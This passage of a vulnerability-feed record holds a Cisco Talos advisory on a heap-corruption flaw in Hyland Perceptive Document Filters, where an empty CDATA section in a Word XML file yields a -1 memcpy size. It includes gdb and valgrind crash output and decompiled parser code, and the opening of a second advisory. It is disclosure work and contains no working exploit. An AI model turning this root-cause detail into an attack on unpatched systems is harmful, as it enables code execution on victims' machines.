ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #22 0xf6104ff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #23 0xf6101524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #24 0x08054e88 in ?? ()\n #25 0xf5a72637 in __libc_start_main (main=0x8054d40, argc=5, argv=0xffb76ed4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f04880 <_dl_fini>, stack_end=0xffb76ecc) at ../csu/libc-start.c:291\n #26 0x080531b1 in ?? 
()\n \n \n gdb-peda$ context\n [----------------------------------registers-----------------------------------]\n EAX: 0xfff9de36 \n EBX: 0x98b7000 \n ECX: 0x9877500 (\".microsoft.com/aml/2001/core\\\" xml:space=\\\"preserve\\\">\\n\\t<w:body>\\n\\t\\t<w:tc>\\n\\t\\t\\t<w:t><![CDATA[]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n EDX: 0x9877558 (\"]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n ESI: 0xffb747e4 --> 0xf7e9bda8 (:CMemoryStream+8>: 0xf602a180)\n EDI: 0xffffffff \n EBP: 0xffb745d8 --> 0xffb74678 --> 0xffb74718 --> 0xffb747b8 --> 0xffb74818 --> 0xffb748a8 (--> ...)\n ESP: 0xffb745a8 --> 0xf7ea834c --> 0x205a0e0 \n EIP: 0xf5b80fff --> 0x3e70f66\n EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf5b80fed <__memcpy_sse2_unaligned+621>: movdqu xmm5,XMMWORD PTR [ebx+eax*1+0x50]\n 0xf5b80ff3 <__memcpy_sse2_unaligned+627>: movdqu xmm6,XMMWORD PTR [ebx+eax*1+0x60]\n 0xf5b80ff9 <__memcpy_sse2_unaligned+633>: movdqu xmm7,XMMWORD PTR [ebx+eax*1+0x70]\n => 0xf5b80fff <__memcpy_sse2_unaligned+639>: movntdq XMMWORD PTR [ebx],xmm0\n 0xf5b81003 <__memcpy_sse2_unaligned+643>: movntdq XMMWORD PTR [ebx+0x10],xmm1\n 0xf5b81008 <__memcpy_sse2_unaligned+648>: movntdq XMMWORD PTR [ebx+0x20],xmm2\n 0xf5b8100d <__memcpy_sse2_unaligned+653>: movntdq XMMWORD PTR [ebx+0x30],xmm3\n 0xf5b81012 <__memcpy_sse2_unaligned+658>: movntdq XMMWORD PTR [ebx+0x40],xmm4\n [------------------------------------stack-------------------------------------]\n 0000| 0xffb745a8 --> 0xf7ea834c --> 0x205a0e0 \n 0004| 0xffb745ac --> 0xf6028fef (:CMemoryStream::Write(void const*, unsigned int)+63>: 0x89f0458b)\n 0008| 0xffb745b0 --> 0x9877558 (\"]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n 0012| 0xffb745b4 --> 0x981538e 
(\"]]></generic-file>]]></w:t>\\n\\t\\t</w:tc>\\n\\t</w:body>\\n</w:wordDocument>\")\n 0016| 0xffb745b8 --> 0xffffffff \n 0020| 0xffb745bc --> 0xffb74620 --> 0xf5df806c (:string::_Rep::_S_empty_rep_storage+12>: 0x00000000)\n 0024| 0xffb745c0 --> 0xf63b9287 (\"<![CDATA[\")\n 0028| 0xffb745c4 --> 0xf63b9290 --> 0x3e5d5d00 ('')\n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n gdb-peda$ \n \n\nAs we can see, an out of bounds write appeared during a `memcpy` operation causing access violation. Stepping back we see that the `memcpy` function was called with the following parameters:\n \n \n [-------------------------------------code-------------------------------------]\n 0xf6028fe5 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+53>: mov edx,DWORD PTR [ebp+0xc]\n 0xf6028fe8 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+56>: push edx\n 0xf6028fe9 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+57>: push eax\n => 0xf6028fea <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+58>: call 0xf5fc77ec <memcpy@plt>\n 0xf6028fef <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+63>: mov eax,DWORD PTR [ebp-0x10]\n 0xf6028ff2 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+66>: mov DWORD PTR [esi+0xc],eax\n 0xf6028ff5 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+69>: add esp,0x10\n 0xf6028ff8 <ISYS_NS::CMemoryStream::Write(void const*, unsigned int)+72>: mov eax,edi\n Guessed arguments:\n arg[0]: 0x9877558 (\"\"...)\n arg[1]: 0x981538e (\"]]>...\")\n arg[2]: 0xffffffff \n \n\nSo the `size` parameter is set to 0xffffffff ( `-1` ) which explains why the `memcpy` operation ended up with an access violation. Why does the `size` parameter have that value? 
Tracking code execution back, we end up in the place where it is calculated:\n \n \n Line 1 ISYS_NS::XML::CXMLDocumentImpl *__cdecl ISYS_NS::XML::CXMLDocumentImpl::load(ISYS_NS::XML::CXMLDocumentImpl *this)\n Line 2 {\n Line 3 (...)\n Line 4 if ( *CDATAElement != '!' )\n Line 5 goto LABEL_17;\n Line 6 v2 = CDATAElement + 1;\n Line 7 v9 = CDATAElement[1];\n Line 8 if ( v9 == '[' )\n Line 9 {\n Line 10 if ( CDATAElement[2] == 'C'\n Line 11 && CDATAElement[3] == 'D'\n Line 12 && CDATAElement[4] == 'A'\n Line 13 && CDATAElement[5] == 'T'\n Line 14 && CDATAElement[6] == 'A'\n Line 15 && CDATAElement[7] == '[' )\n Line 16 {\n Line 17 CDATAElementTextBeg = CDATAElement + 8;\n Line 18 v48 = (ISYS_NS::XML::XMLNode *)ISYS_NS::XML::CXMLDocumentImpl::addNode(this, &byte_F64729AE, 0, 3, v45);\n Line 19 v26 = CDATAElement[8];\n Line 20 if ( !v26 )\n Line 21 {\n Line 22 v28 = CDATAElement + 8;\n Line 23 v39 = 0;\n Line 24 LABEL_91:\n Line 25 ISYS_NS::XML::CXMLDocumentImpl::setTextContent(this, v48, CDATAElementTextBeg, v39, 0);\n Line 26 goto LABEL_87;\n Line 27 }\n Line 28 CDATAElementTextEnd = CDATAElement + 8;\n Line 29 while ( 2 )\n Line 30 {\n Line 31 if ( v26 == ']' )\n Line 32 {\n Line 33 v28 = CDATAElementTextEnd + 1;\n Line 34 if ( CDATAElementTextEnd[1] != ']' )\n Line 35 goto LABEL_49;\n Line 36 if ( CDATAElementTextEnd[2] == '>' )\n Line 37 {\n Line 38 ISYS_NS::XML::CXMLDocumentImpl::setTextContent(\n Line 39 this,\n Line 40 v48,\n Line 41 CDATAElementTextBeg,\n Line 42 CDATAElementTextEnd - 1 - CDATAElementTextBeg,\n Line 43 0);\n Line 44 v28 = CDATAElementTextEnd + 2;\n Line 45 LABEL_87:\n Line 46 v45 = (ISYS_NS::XML::XMLNode *)*((_DWORD *)v48 + 1);\n Line 47 v2 = v28 + 1;\n Line 48 goto LABEL_9;\n Line 49 }\n Line 50 }\n Line 51 else\n Line 52 {\n Line 53 v28 = CDATAElementTextEnd + 1;\n Line 54 LABEL_49:\n Line 55 v26 = *v28;\n Line 56 if ( !*v28 )\n Line 57 {\n Line 58 v39 = v28 - CDATAElementTextBeg;\n Line 59 goto LABEL_91;\n Line 60 }\n Line 61 }\n Line 62 
CDATAElementTextEnd = v28;\n Line 63 continue;\n Line 64 }\n Line 65 }\n \n\nThe `memcpy` `size` parameter value is calculated at `line 43`, where it is passed as an argument to the `ISYS_NS::XML::CXMLDocumentImpl::setTextContent` function call. Generally speaking, this fragment of code is responsible for finding the `CDATA` section in an XML document and measuring the length of the text that this section contains. In our example the `CDATA` section does not contain any text, so the calculation made at `line 43`, where:\n \n \n CDATAElementTextBeg == CDATAElementTextEnd\n \n\nwill end up with a value equal to `-1`. Later, as we saw above, this huge unsigned value is used as the size of the `memcpy` operation, which leads to heap corruption that an attacker could potentially leverage to gain remote code execution.\n\n### Crash Information\n \n \n File type: Microsoft Word (25); Capabilities: 3 - malformed_doc.xml\n ==85982== Invalid read of size 2\n ==85982== at 0x4030F1C: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: 
ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Address 0x6b3e846 is 510 bytes inside a block of size 511 alloc'd\n ==85982== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x61B9D45: std::string::_Rep::_S_create(unsigned int, unsigned int, std::allocator<char> const&) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAF18: std::string::_Rep::_M_clone(std::allocator<char> const&, unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAFD9: std::string::reserve(unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB48B: std::string::append(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB569: std::string::resize(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x41DB027: ISYS_NS::XML::CXMLDocument::load(ISYS_NS::CStream*, ISYS_NS::XML::XML_ENCODING) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x43391B9: ISYS_NS::CMSOfficeXML::CMSOfficeXML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n 
==85982== by 0x433A661: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== \n ==85982== Invalid read of size 2\n ==85982== at 0x4030F10: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in 
/home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Address 0x6b3e848 is 1 bytes after a block of size 511 alloc'd\n ==85982== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x61B9D45: std::string::_Rep::_S_create(unsigned int, unsigned int, std::allocator<char> const&) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAF18: std::string::_Rep::_M_clone(std::allocator<char> const&, unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAFD9: std::string::reserve(unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB48B: std::string::append(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB569: std::string::resize(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x41DB027: ISYS_NS::XML::CXMLDocument::load(ISYS_NS::CStream*, ISYS_NS::XML::XML_ENCODING) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x43391B9: ISYS_NS::CMSOfficeXML::CMSOfficeXML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A661: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== \n ==85982== Invalid write of size 2\n ==85982== at 0x4030F13: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Address 0x6b42980 is 0 bytes after a block of size 8,192 alloc'd\n ==85982== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221DAB: ISYS_NS::CMemoryStream::_malloc(unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4221E0F: ISYS_NS::CMemoryStream::Realloc(unsigned int*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4221ED6: ISYS_NS::CMemoryStream::SetCapacity(unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x422205C: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC7AC: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== \n ==85982== \n ==85982== Process terminating with default action of signal 11 (SIGSEGV)\n ==85982== Bad permissions for mapped region at address 0x7140000\n ==85982== at 0x4030F13: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Invalid read of size 4\n ==85982== at 0x63D2015: tdestroy_recurse (tsearch.c:639)\n ==85982== by 0x63D202D: tdestroy_recurse (tsearch.c:640)\n ==85982== by 0x6431977: free_mem (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x6431B09: __libc_freeres (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x4026506: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-x86-linux.so)\n ==85982== by 0xFFFFFFFB: ???\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== Address 0x1b54 is not stack'd, malloc'd or (recently) free'd\n ==85982== \n ==85982== \n ==85982== Process terminating with default action of signal 11 (SIGSEGV)\n ==85982== Access not within mapped region at address 0x1B54\n ==85982== at 0x63D2015: tdestroy_recurse 
(tsearch.c:639)\n ==85982== by 0x63D202D: tdestroy_recurse (tsearch.c:640)\n ==85982== by 0x6431977: free_mem (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x6431B09: __libc_freeres (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x4026506: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-x86-linux.so)\n ==85982== by 0xFFFFFFFB: ???\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== If you believe this happened as a result of a stack\n ==85982== overflow in your program's main thread (unlikely but\n ==85982== possible), you can try to increase the size of the\n ==85982== main thread stack using the --main-stacksize= flag.\n ==85982== The main thread stack size used in this run was 8388608.\n ==85982== \n ==85982== HEAP SUMMARY:\n ==85982== in use at exit: 788,001 bytes in 10,974 blocks\n ==85982== total heap usage: 57,614 allocs, 46,640 frees, 22,967,606 bytes allocated\n ==85982== \n ==85982== LEAK SUMMARY:\n ==85982== 
definitely lost: 195,319 bytes in 3,959 blocks\n ==85982== indirectly lost: 215,017 bytes in 5,663 blocks\n ==85982== possibly lost: 44,931 bytes in 657 blocks\n ==85982== still reachable: 332,734 bytes in 695 blocks\n ==85982== of which reachable via heuristic:\n ==85982== stdstring : 8,026 bytes in 399 blocks\n ==85982== suppressed: 0 bytes in 0 blocks\n ==85982== Rerun with --leak-check=full to see details of leaked memory\n ==85982== \n ==85982== For counts of detected and suppressed errors, rerun with: -v\n ==85982== ERROR SUMMARY: 9016847 errors from 4 contexts (suppressed: 0 from 0)\n \n\n### Timeline\n\n2018-02-27 - Vendor Disclosure \n2018-03-22 - Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3851"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0534", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0534", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T17:44:57", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0528\n\n## Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3845\n\n### Summary\n\nAn exploitable double free exists in the OpenDocument to JPEG conversion functionality of the Hyland Perceptive Document Filters version 11.4.0.2647. 
